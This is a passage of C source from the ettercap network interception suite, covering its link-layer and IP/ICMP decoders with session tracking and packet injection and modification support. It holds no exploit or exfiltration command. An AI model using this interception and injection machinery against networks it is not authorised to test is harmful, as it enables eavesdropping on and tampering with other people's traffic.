the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ struct eth_header { u_int8 dha[ETH_ADDR_LEN]; /* destination eth addr */ u_int8 sha[ETH_ADDR_LEN]; /* source ether addr */ u_int16 proto; /* packet type ID field */ }; /* protos */ FUNC_DECODER(decode_eth); FUNC_BUILDER(build_eth); FUNC_ALIGNER(align_eth); void eth_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init eth_init(void) { add_decoder(LINK_LAYER, IL_TYPE_ETH, decode_eth); add_builder(IL_TYPE_ETH, build_eth); add_aligner(IL_TYPE_ETH, align_eth); } FUNC_DECODER(decode_eth) { FUNC_DECODER_PTR(next_decoder); struct eth_header *eth; DECODED_LEN = sizeof(struct eth_header); eth = (struct eth_header *)DECODE_DATA; /* fill the packet object with sensitive data */ PACKET->L2.header = (u_char *)DECODE_DATA; PACKET->L2.proto = IL_TYPE_ETH; PACKET->L2.len = DECODED_LEN; memcpy(PACKET->L2.src, eth->sha, ETH_ADDR_LEN); memcpy(PACKET->L2.dst, eth->dha, ETH_ADDR_LEN); /* HOOK POINT : HOOK_PACKET_ETH */ hook_point(HOOK_PACKET_ETH, po); /* leave the control to the next decoder */ next_decoder = get_decoder(NET_LAYER, ntohs(eth->proto)); EXECUTE_DECODER(next_decoder); /* eth header does not care about modification of upper layer */ return NULL; } /* * function to create an ethernet header */ FUNC_BUILDER(build_eth) { return libnet_autobuild_ethernet( dst, /* ethernet destination */ proto, /* protocol type */ l); /* libnet handle */ } /* * alignment function */ FUNC_ALIGNER(align_eth) { /* 16 is the nearest multiplier of 4 */ return (16 - sizeof(struct eth_header)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_fddi.c000664 000000 000000 00000006636 13711276346 020031 0ustar00rootroot000000 000000 /* ettercap -- FDDI decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ struct fddi_header { u_int8 frame_control; u_int8 dha[FDDI_ADDR_LEN]; u_int8 sha[FDDI_ADDR_LEN]; u_int8 llc_dsap; u_int8 llc_ssap; u_int8 llc_control; u_int8 llc_org_code[3]; /* * ARGH ! org_core is 3 and it has disaligned the struct ! * we can rely in on the alignment of the buffer... */ u_int16 proto; }; /* encapsulated ethernet */ u_int8 FDDI_ORG_CODE[3] = {0x00, 0x00, 0x00}; /* protos */ FUNC_DECODER(decode_fddi); FUNC_BUILDER(build_fddi); FUNC_ALIGNER(align_fddi); void fddi_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init fddi_init(void) { add_decoder(LINK_LAYER, IL_TYPE_FDDI, decode_fddi); add_builder(IL_TYPE_FDDI, build_fddi); add_aligner(IL_TYPE_FDDI, align_fddi); } FUNC_DECODER(decode_fddi) { FUNC_DECODER_PTR(next_decoder); struct fddi_header *fddi; DECODED_LEN = sizeof(struct fddi_header); fddi = (struct fddi_header *)DECODE_DATA; /* org_code != encapsulated ethernet not yet supported */ if (memcmp(fddi->llc_org_code, FDDI_ORG_CODE, 3)) NOT_IMPLEMENTED(); /* fill the packet object with sensitive data */ PACKET->L2.header = (u_char *)DECODE_DATA; PACKET->L2.proto = IL_TYPE_FDDI; PACKET->L2.len = DECODED_LEN; memcpy(PACKET->L2.src, fddi->sha, FDDI_ADDR_LEN); memcpy(PACKET->L2.dst, fddi->dha, FDDI_ADDR_LEN); /* HOOK POINT : HOOK_PACKET_fddi */ hook_point(HOOK_PACKET_FDDI, po); /* leave the control to the next decoder */ next_decoder = get_decoder(NET_LAYER, ntohs(fddi->proto)); EXECUTE_DECODER(next_decoder); /* fddi header does not care about modification of upper layer */ return NULL; } /* * function to create a token ring header */ FUNC_BUILDER(build_fddi) { return libnet_autobuild_fddi( LIBNET_FDDI_FC_REQD | 0x04, /* Asynch LLC - priority 4 */ dst, /* token ring destination */ LIBNET_SAP_SNAP, /* DSAP -> SNAP encap */ LIBNET_SAP_SNAP, /* SSAP -> SNAP encap */ 0x03, /* Unnumbered info/frame */ FDDI_ORG_CODE, /* Organization Code */ proto, /* protocol type */ l); /* libnet handle */ } /* * alignment function */ FUNC_ALIGNER(align_fddi) { return (24 - sizeof(struct fddi_header)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_gre.c000664 000000 000000 00000005752 13711276346 017676 0ustar00rootroot000000 000000 /* ettercap -- GRE decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ /* Flag mask - * (taken from wireshark gre decoder * by Brad Robel-Forrest) */ #define GH_B_C 0x8000 #define GH_B_R 0x4000 #define GH_B_K 0x2000 #define GH_B_S 0x1000 #define GH_B_s 0x0800 #define GH_B_RECUR 0x0700 #define GH_P_A 0x0080 #define GH_P_FLAGS 0x0078 #define GH_R_FLAGS 0x00F8 #define GH_B_VER 0x0007 /* protos */ FUNC_DECODER(decode_gre); void gre_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init gre_init(void) { add_decoder(PROTO_LAYER, NL_TYPE_GRE, decode_gre); } FUNC_DECODER(decode_gre) { FUNC_DECODER_PTR(next_decoder); u_int16 flags; u_int16 proto; u_int16 *gre_len = NULL; DECODED_LEN = 4; flags = pntos(DECODE_DATA); proto = pntos(DECODE_DATA + sizeof(flags)); /* Parse the flags and see which fields are present */ if (flags & GH_B_C || flags & GH_B_R) DECODED_LEN += 4; if (flags & GH_B_K) { /* We have to deal with it if we modify the packet */ gre_len = (u_int16 *)(DECODE_DATA + DECODED_LEN); DECODED_LEN += 4; /* Use L4.len to store the whole gre packet len. * It will be used by some plugins, and it will be * overwritten by the real TCP/UDP decoders. */ PACKET->L4.len = ntohs(*gre_len); } if (flags & GH_B_S) DECODED_LEN += 4; if (flags & GH_P_A) DECODED_LEN += 4; /* HOOK POINT: HOOK_PACKET_GRE */ hook_point(HOOK_PACKET_GRE, PACKET); SESSION_CLEAR(PACKET); /* get the next decoder */ next_decoder = get_decoder(NET_LAYER, proto); EXECUTE_DECODER(next_decoder); /* Adjust GRE payload len (if present) */ if (!EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->read && (PACKET->flags & PO_MODIFIED) && (PACKET->flags & PO_FORWARDABLE)) { /* XXX - Feature checksum re-calculation (if present) */ /* XXX - Feature packet injection/dropping */ if (gre_len) ORDER_ADD_SHORT(*gre_len, PACKET->DATA.delta); } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_icmp.c000664 000000 000000 00000006732 13711276346 020050 0ustar00rootroot000000 000000 /* ettercap -- ICMP decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ struct icmp_header { u_int8 type; /* message type */ u_int8 code; /* type sub-code */ u_int16 csum; union { struct { u_int16 id; u_int16 sequence; } echo; /* echo datagram */ u_int32 gateway; /* gateway address (for redirect) */ struct { u_int16 unused; u_int16 mtu; } frag; /* path mtu discovery */ } un; }; /* protos */ FUNC_DECODER(decode_icmp); void icmp_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init icmp_init(void) { add_decoder(PROTO_LAYER, NL_TYPE_ICMP, decode_icmp); } FUNC_DECODER(decode_icmp) { FUNC_DECODER_PTR(next_decoder); struct icmp_header *icmp; u_int16 sum; icmp = (struct icmp_header *)DECODE_DATA; DECODED_LEN = sizeof(struct icmp_header); /* include the data in this level */ PACKET->L4.len = PACKET->L3.payload_len; /* fill the data */ PACKET->L4.header = (u_char *)DECODE_DATA; PACKET->L4.options = NULL; PACKET->L4.proto = NL_TYPE_ICMP; /* this is a lie... but we have to put this somewhere */ PACKET->L4.flags = icmp->type; /* * if the checsum is wrong, don't parse it (avoid ettercap spotting) * the checksum should be 0 ;) * * don't perform the check in unoffensive mode */ if (EC_GBL_CONF->checksum_check) { if (!EC_GBL_OPTIONS->unoffensive && (sum = L3_checksum(PACKET->L4.header, PACKET->L4.len)) != CSUM_RESULT) { char tmp[MAX_ASCII_ADDR_LEN]; if (EC_GBL_CONF->checksum_warning) USER_MSG("Invalid ICMP packet from %s : csum [%#x] should be (%#x)\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(icmp->csum), checksum_shouldbe(icmp->csum, sum)); return NULL; } } /* * if the host is sending strange * ICMP messages, it might be a router */ switch (icmp->type) { case ICMP_DEST_UNREACH: switch (icmp->code) { case ICMP_NET_UNREACH: case ICMP_HOST_UNREACH: PACKET->PASSIVE.flags |= FP_ROUTER; break; } break; case ICMP_REDIRECT: case ICMP_TIME_EXCEEDED: PACKET->PASSIVE.flags |= FP_ROUTER; break; } /* HOOK POINT: HOOK_PACKET_ICMP */ hook_point(HOOK_PACKET_ICMP, po); /* get the next decoder */ next_decoder = get_decoder(APP_LAYER, PL_DEFAULT); EXECUTE_DECODER(next_decoder); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_icmp6.c000664 000000 000000 00000005521 13711276346 020131 0ustar00rootroot000000 000000 /* ettercap - ICMPv6 decoder module Copyright (C) the braindamaged entities collective GPL blah-blah-blah */ #include #include #include struct icmp6_hdr { u_int8 type; u_int8 code; u_int16 csum; /* other stuff lies here */ }; struct lla { u_int8 type; #define LLA_SOURCE 1 #define LLA_TARGET 2 u_int8 len; }; FUNC_DECODER(decode_icmp6); void icmp6_init(void); void __init icmp6_init(void) { add_decoder(PROTO_LAYER, NL_TYPE_ICMP6, decode_icmp6); } FUNC_DECODER(decode_icmp6) { FUNC_DECODER_PTR(next_decoder); struct icmp6_hdr *icmp6; u_int16 csum; icmp6 = (struct icmp6_hdr*)DECODE_DATA; PACKET->L4.proto = NL_TYPE_ICMP6; /* since ICMPv6 header has no such field */ PACKET->L4.len = PACKET->L3.payload_len; PACKET->L4.header = (u_char *)DECODE_DATA; /* This fields may be initialized later */ PACKET->L4.options = NULL; PACKET->L4.optlen = 0; /* Why not? */ PACKET->L4.flags = icmp6->type; DECODED_LEN = sizeof(struct icmp6_hdr); /* this sucked. Now it sucks less. */ if(EC_GBL_CONF->checksum_check && !EC_GBL_OPTIONS->unoffensive) { if((csum = L4_checksum(PACKET)) != CSUM_RESULT) { if(EC_GBL_CONF->checksum_warning) { char tmp[MAX_ASCII_ADDR_LEN]; USER_MSG("Invalid ICMPv6 packet from %s : csum [%#x] should be (%#x)\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(icmp6->csum), checksum_shouldbe(icmp6->csum, csum)); } return NULL; } } /* * trying to detect a router */ switch(icmp6->type) { case ICMP6_ROUTER_ADV: case ICMP6_PKT_TOO_BIG: PACKET->PASSIVE.flags |= FP_ROUTER; break; case ICMP6_NEIGH_ADV: if ((*((u_int8*)icmp6 + 4) & 0x80) == 0x80) { /* Router flag set in neighbor advertisement */ PACKET->PASSIVE.flags |= FP_ROUTER; PACKET->PASSIVE.flags |= FP_GATEWAY; } break; } hook_point(HOOK_PACKET_ICMP6, po); /* get the next decoder */ next_decoder = get_decoder(APP_LAYER, PL_DEFAULT); EXECUTE_DECODER(next_decoder); if(icmp6->type == ICMP6_NEIGH_SOL || icmp6->type == ICMP6_NEIGH_ADV) { PACKET->L4.options = (u_char*)(icmp6) + 4; PACKET->L4.optlen = PACKET->L4.len - sizeof(struct icmp6_hdr) - 4; } /* * Here come the hooks */ switch(icmp6->type) { case ICMP6_NEIGH_SOL: hook_point(HOOK_PACKET_ICMP6_NSOL, PACKET); break; case ICMP6_NEIGH_ADV: hook_point(HOOK_PACKET_ICMP6_NADV, PACKET); break; case ICMP6_ECHOREPLY: hook_point(HOOK_PACKET_ICMP6_RPLY, PACKET); break; case ICMP6_BAD_PARAM: hook_point(HOOK_PACKET_ICMP6_PARM, PACKET); break; } return NULL; } ettercap-0.8.3.1/src/protocols/ec_ip.c000664 000000 000000 00000030672 13711276346 017530 0ustar00rootroot000000 000000 /* ettercap -- IP decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include /* globals */ struct ip_header { #ifndef WORDS_BIGENDIAN u_int8 ihl:4; u_int8 version:4; #else u_int8 version:4; u_int8 ihl:4; #endif u_int8 tos; u_int16 tot_len; u_int16 id; u_int16 frag_off; #define IP_DF 0x4000 #define IP_MF 0x2000 #define IP_FRAG 0x1fff u_int8 ttl; u_int8 protocol; u_int16 csum; u_int32 saddr; u_int32 daddr; /*The options start here. */ }; /* Session data structure */ struct ip_status { u_int16 last_id; int16 id_adj; }; /* Ident structure for ip sessions */ struct ip_ident { u_int32 magic; #define IP_MAGIC 0x0300e77e struct ip_addr L3_src; }; #define IP_IDENT_LEN sizeof(struct ip_ident) /* protos */ FUNC_DECODER(decode_ip); FUNC_INJECTOR(inject_ip); FUNC_INJECTOR(stateless_ip); void ip_init(void); int ip_match(void *id_sess, void *id_curr); void ip_create_session(struct ec_session **s, struct packet_object *po); size_t ip_create_ident(void **i, struct packet_object *po); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init ip_init(void) { add_decoder(NET_LAYER, LL_TYPE_IP, decode_ip); add_decoder(PROTO_LAYER, NL_TYPE_IPIP, decode_ip); add_decoder(NET_LAYER, LL_TYPE_PPP_IP, decode_ip); add_injector(CHAIN_LINKED, IP_MAGIC, inject_ip); add_injector(CHAIN_LINKED, STATELESS_IP_MAGIC, stateless_ip); } FUNC_DECODER(decode_ip) { FUNC_DECODER_PTR(next_decoder); struct ip_header *ip; struct ec_session *s = NULL; void *ident = NULL; struct ip_status *status = NULL; u_int32 t_len; u_int16 sum; ip = (struct ip_header *)DECODE_DATA; DECODED_LEN = (u_int32)(ip->ihl * 4); if (DECODED_LEN < 20) { // invalid header length return NULL; } /* IP addresses */ ip_addr_init(&PACKET->L3.src, AF_INET, (u_char *)&ip->saddr); ip_addr_init(&PACKET->L3.dst, AF_INET, (u_char *)&ip->daddr); /* this is needed at upper layer to calculate the tcp payload size */ /* check bogus size */ t_len = (u_int32) ntohs(ip->tot_len); if (t_len < (u_int32)DECODED_LEN || (DECODE_DATA + t_len) > (PACKET->packet + PACKET->len) ) return NULL; PACKET->L3.payload_len = t_len - DECODED_LEN; /* other relevant infos */ PACKET->L3.header = (u_char *)DECODE_DATA; PACKET->L3.len = DECODED_LEN; /* parse the options */ if ( (u_int32)(ip->ihl * 4) > sizeof(struct ip_header)) { PACKET->L3.options = (u_char *)(DECODE_DATA) + sizeof(struct ip_header); PACKET->L3.optlen = (u_int32)(ip->ihl * 4) - sizeof(struct ip_header); } else { PACKET->L3.options = NULL; PACKET->L3.optlen = 0; } PACKET->L3.proto = htons(LL_TYPE_IP); PACKET->L3.ttl = ip->ttl; /* First IP decoder set its header as packet to be forwarded */ if (PACKET->fwd_packet == NULL) { /* Don't parse packets we have forwarded */ EXECUTE(EC_GBL_SNIFF->check_forwarded, PACKET); if (PACKET->flags & PO_FORWARDED) return NULL; /* set PO_FORWARDABLE flag */ EXECUTE(EC_GBL_SNIFF->set_forwardable, PACKET); /* set the pointer to the data to be forwarded at layer 3 */ PACKET->fwd_packet = (u_char *)DECODE_DATA; /* the len will be adjusted later...just in case of a brutal return */ PACKET->fwd_len = t_len; } /* XXX - implement the handling of fragmented packet */ /* don't process fragmented packets */ if (ntohs(ip->frag_off) & IP_FRAG || ntohs(ip->frag_off) & IP_MF) return NULL; /* * if the checsum is wrong, don't parse it (avoid ettercap spotting) * the checksum should be 0 ;) * * don't perform the check in unoffensive mode */ if (EC_GBL_CONF->checksum_check) { if (!EC_GBL_OPTIONS->unoffensive && (sum = L3_checksum(PACKET->L3.header, PACKET->L3.len)) != CSUM_RESULT) { if (EC_GBL_CONF->checksum_warning) USER_MSG("Invalid IP packet from %s : csum [%#x] should be (%#x)\n", int_ntoa(ip->saddr), ntohs(ip->csum), checksum_shouldbe(ip->csum, sum)); return NULL; } } /* if it is a TCP packet, try to passive fingerprint it */ if (ip->protocol == NL_TYPE_TCP) { /* initialize passive fingerprint */ fingerprint_default(PACKET->PASSIVE.fingerprint); /* collect infos for passive fingerprint */ fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_TTL, ip->ttl); fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_DF, ntohs(ip->frag_off) & IP_DF); fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_LT, ip->ihl * 4); } /* calculate if the dest is local or not */ switch (ip_addr_is_local(&PACKET->L3.src, NULL)) { case E_SUCCESS: PACKET->PASSIVE.flags &= ~(FP_HOST_NONLOCAL); PACKET->PASSIVE.flags |= FP_HOST_LOCAL; break; case -E_NOTFOUND: PACKET->PASSIVE.flags &= ~FP_HOST_LOCAL; PACKET->PASSIVE.flags |= FP_HOST_NONLOCAL; break; case -E_INVALID: PACKET->PASSIVE.flags = FP_UNKNOWN; break; } /* HOOK POINT: HOOK_PACKET_IP */ hook_point(HOOK_PACKET_IP, po); /* don't save the sessions in unoffensive mode */ if (EC_GBL_FILTERS && !EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->read) { /* Find or create the correct session */ ip_create_ident(&ident, PACKET); if (session_get(&s, ident, IP_IDENT_LEN) == -E_NOTFOUND) { ip_create_session(&s, PACKET); session_put(s); } SAFE_FREE(ident); SESSION_PASSTHRU(s, PACKET); /* Record last packet's ID */ status = (struct ip_status *)s->data; status->last_id = ntohs(ip->id); } /* Jump to next Layer */ next_decoder = get_decoder(PROTO_LAYER, ip->protocol); EXECUTE_DECODER(next_decoder); /* don't save the sessions in unoffensive mode */ if (EC_GBL_FILTERS && !EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->read && (PACKET->flags & PO_FORWARDABLE)) { /* * Modification checks and adjustments. * - ip->id according to number of injected/dropped packets * - ip->len according to upper layer's payload modification */ if (PACKET->flags & PO_DROPPED) status->id_adj--; else if ((PACKET->flags & PO_MODIFIED) || (status->id_adj != 0)) { /* se the correct id for this packet */ ORDER_ADD_SHORT(ip->id, status->id_adj); /* adjust the packet length */ ORDER_ADD_SHORT(ip->tot_len, PACKET->DATA.delta); /* * In case some upper level encapsulated * ip decoder modified it... (required for checksum) */ PACKET->L3.header = (u_char *)ip; PACKET->L3.len = (u_int32)(ip->ihl * 4); /* ...recalculate checksum */ ip->csum = CSUM_INIT; ip->csum = L3_checksum(PACKET->L3.header, PACKET->L3.len); } } /* Last ip decoder in cascade will set the correct fwd_len */ PACKET->fwd_len = ntohs(ip->tot_len); return NULL; } /*******************************************/ FUNC_INJECTOR(inject_ip) { struct ec_session *s = NULL; struct ip_status *status; struct ip_header *iph; size_t further_len, payload_len; u_int32 magic; /* Paranoid check */ if (LENGTH + sizeof(struct ip_header) > EC_GBL_IFACE->mtu) return -E_NOTHANDLED; /* Make space for ip header on packet stack... */ PACKET->packet -= sizeof(struct ip_header); /* ..and fill it */ iph = (struct ip_header *)PACKET->packet; iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->csum = CSUM_INIT; iph->frag_off = 0; iph->ttl = 64; iph->protocol = PACKET->L4.proto; iph->saddr = *PACKET->L3.src.addr32; iph->daddr = *PACKET->L3.dst.addr32; /* Take the session and fill remaining fields */ s = PACKET->session; status = (struct ip_status *)s->data; iph->id = htons(status->last_id + status->id_adj + 1); /* Renew session timestamp (XXX it locks the sessions) */ if (session_get(&s, s->ident, IP_IDENT_LEN) == -E_NOTFOUND) return -E_NOTFOUND; /* Adjust headers length */ LENGTH += sizeof(struct ip_header); /* Rember length of further headers */ further_len = LENGTH; if (s->prev_session != NULL) { /* Prepare data for next injector */ PACKET->session = s->prev_session; memcpy(&magic, s->prev_session->ident, 4); /* Go deeper into injectors chain */ EXECUTE_INJECTOR(CHAIN_LINKED, magic); } /* Update session */ status->id_adj ++; /* Guess payload_len that will be used by ENTRY injector */ payload_len = EC_GBL_IFACE->mtu - LENGTH; if (payload_len > PACKET->DATA.inject_len) payload_len = PACKET->DATA.inject_len; /* Set tot_len field as further header's len + payload */ PACKET->L3.len = further_len + payload_len; iph->tot_len = htons(PACKET->L3.len); /* Calculate checksum */ PACKET->L3.header = (u_char *)iph; iph->csum = L3_checksum(PACKET->L3.header, PACKET->L3.len); /* Set fields to forward the packet (only if the chain is ended) */ if (s->prev_session == NULL) { PACKET->fwd_packet = PACKET->packet; PACKET->fwd_len = PACKET->L3.len; } /* Injectors executed, no need to keep the session */ session_del(s->ident, IP_IDENT_LEN); return E_SUCCESS; } /* Used to link sessionless udp with correct ip session */ FUNC_INJECTOR(stateless_ip) { struct ec_session *s = NULL; void *ident = NULL; /* Find the correct IP session */ ip_create_ident(&ident, PACKET); if (session_get(&s, ident, IP_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return -E_NOTFOUND; } PACKET->session = s; /* Execute IP injector */ EXECUTE_INJECTOR(CHAIN_LINKED, IP_MAGIC); SAFE_FREE(ident); return E_SUCCESS; } /*******************************************/ /* Sessions' stuff for ip packets */ /* * create the ident for a session */ size_t ip_create_ident(void **i, struct packet_object *po) { struct ip_ident *ident; /* allocate the ident for that session */ SAFE_CALLOC(ident, 1, sizeof(struct ip_ident)); /* the magic */ ident->magic = IP_MAGIC; /* prepare the ident */ memcpy(&ident->L3_src, &po->L3.src, sizeof(struct ip_addr)); /* return the ident */ *i = ident; /* return the length of the ident */ return sizeof(struct ip_ident); } /* * compare two session ident * * return 1 if it matches */ int ip_match(void *id_sess, void *id_curr) { struct ip_ident *ids = id_sess; struct ip_ident *id = id_curr; /* sanity check */ BUG_IF(ids == NULL); BUG_IF(id == NULL); /* * is this ident from our level ? * check the magic ! */ if (ids->magic != id->magic) return 0; /* Check the source */ if ( !ip_addr_cmp(&ids->L3_src, &id->L3_src) ) return 1; return 0; } /* * prepare the ident and the pointer to match function * for ip layer. */ void ip_create_session(struct ec_session **s, struct packet_object *po) { void *ident; DEBUG_MSG("ip_create_session"); /* allocate the session */ SAFE_CALLOC(*s, 1, sizeof(struct ec_session)); /* create the ident */ (*s)->ident_len = ip_create_ident(&ident, po); /* link to the session */ (*s)->ident = ident; /* the matching function */ (*s)->match = &ip_match; /* alloc of data element */ SAFE_CALLOC((*s)->data, 1, sizeof(struct ip_status)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_ip6.c000664 000000 000000 00000021227 13711276346 017612 0ustar00rootroot000000 000000 /* ettercap -- IPv6 decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include //#include #define IP6_HDR_LEN 40 /* globals */ struct ip6_header { #ifndef WORDS_BIGENDIAN u_int8 version:4; u_int8 priority:4; #else u_int8 priority:4; u_int8 version:4; #endif u_int8 flow_lbl[3]; u_int16 payload_len; u_int8 next_hdr; u_int8 hop_limit; u_int8 saddr[IP6_ADDR_LEN]; u_int8 daddr[IP6_ADDR_LEN]; }; struct ip6_ext_header { u_int8 next_hdr; u_int8 hdr_len; /* Here must be options */ }; struct ip6_ident { u_int32 magic; #define IP6_MAGIC 0x0306e77e u_int8 flow_lbl[3]; struct ip_addr L3_src; }; struct ip6_data { u_int8 priority :4; }; /* protos */ void ip6_init(void); FUNC_DECODER(decode_ip6); FUNC_DECODER(decode_ip6_ext); FUNC_INJECTOR(inject_ip6); static size_t ip6_create_ident(void **i, struct packet_object *po); static int ip6_match(void *ident_s, void *ident_c); static void ip6_create_session(struct ec_session **s, struct packet_object *po); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init ip6_init(void) { add_decoder(NET_LAYER, LL_TYPE_IP6, decode_ip6); add_decoder(PROTO_LAYER, NL_TYPE_IP6, decode_ip6); add_decoder(NET6_LAYER, LO6_TYPE_HBH, decode_ip6_ext); add_decoder(NET6_LAYER, LO6_TYPE_RT, decode_ip6_ext); add_decoder(NET6_LAYER, LO6_TYPE_DST, decode_ip6_ext); add_injector(CHAIN_LINKED, IP6_MAGIC, inject_ip6); } FUNC_DECODER(decode_ip6) { FUNC_DECODER_PTR(next_decoder); struct ip6_header *ip6; struct ec_session *s; void *ident; ip6 = (struct ip6_header *)DECODE_DATA; if (ip6->payload_len == 0) { DEBUG_MSG("IPv6 jumbogram, Hop-By-Hop header should follow"); } DECODED_LEN = IP6_HDR_LEN; /* IP addresses */ ip_addr_init(&PACKET->L3.src, AF_INET6, (u_char *)&ip6->saddr); ip_addr_init(&PACKET->L3.dst, AF_INET6, (u_char *)&ip6->daddr); /* this is needed at upper layer to calculate the tcp payload size */ PACKET->L3.payload_len = ntohs(ip6->payload_len); /* other relevant infos */ PACKET->L3.header = (u_char *)DECODE_DATA; PACKET->L3.len = DECODED_LEN; PACKET->L3.proto = htons(LL_TYPE_IP6); PACKET->L3.ttl = ip6->hop_limit; if(PACKET->fwd_packet == NULL) { EXECUTE(EC_GBL_SNIFF->check_forwarded, PACKET); /* if it is already forwarded */ if(PACKET->flags & PO_FORWARDED) return NULL; EXECUTE(EC_GBL_SNIFF->set_forwardable, PACKET); PACKET->fwd_packet = (u_char *)DECODE_DATA; PACKET->fwd_len = PACKET->L3.payload_len + DECODED_LEN; } /* calculate if the dest is local or not */ switch (ip_addr_is_local(&PACKET->L3.src, NULL)) { case E_SUCCESS: PACKET->PASSIVE.flags &= ~(FP_HOST_NONLOCAL); PACKET->PASSIVE.flags |= FP_HOST_LOCAL; break; case -E_NOTFOUND: PACKET->PASSIVE.flags &= ~FP_HOST_LOCAL; PACKET->PASSIVE.flags |= FP_HOST_NONLOCAL; break; case -E_INVALID: PACKET->PASSIVE.flags = FP_UNKNOWN; break; } next_decoder = get_decoder(NET6_LAYER, ip6->next_hdr); if(next_decoder == NULL) { PACKET->L3.options = NULL; PACKET->L3.optlen = 0; next_decoder = get_decoder(PROTO_LAYER, ip6->next_hdr); } else { PACKET->L3.options = (u_char *)&ip6[1]; } /* HOOK POINT: HOOK_PACKET_IP6 */ hook_point(HOOK_PACKET_IP6, po); if(!EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->read) { ip6_create_ident(&ident, PACKET); if(session_get(&s, ident, sizeof(struct ip6_ident)) == -E_NOTFOUND) { ip6_create_session(&s, PACKET); session_put(s); } SAFE_FREE(ident); SESSION_PASSTHRU(s, PACKET); } /* passing the packet to options or upper-layer decoder */ EXECUTE_DECODER(next_decoder); /* * External L3 header sets itself * as the packet to be forwarded. */ /* XXX - recheck this */ if(!EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->read && (PACKET->flags & PO_FORWARDABLE)) { if(PACKET->flags & PO_MODIFIED) { ORDER_ADD_SHORT(ip6->payload_len, PACKET->DATA.delta); /* * In case some upper level encapsulated ip6 decoder * modified it ... (required for ip6 in ip6 encapsulation) */ PACKET->L3.header = (u_char*)ip6; PACKET->L3.len = IP6_HDR_LEN; PACKET->L3.payload_len = ntohs(ip6->payload_len); PACKET->fwd_len = PACKET->L3.payload_len + PACKET->L3.len; } } return NULL; } /* XXX - dirty stuff just to make things work. * Rewrite it to handle extension headers (if needed). */ FUNC_DECODER(decode_ip6_ext) { FUNC_DECODER_PTR(next_decoder); struct ip6_ext_header *ext_hdr; ext_hdr = (struct ip6_ext_header *)DECODE_DATA; PACKET->L3.optlen += ext_hdr->hdr_len + 1; DECODED_LEN = ext_hdr->hdr_len + 1; 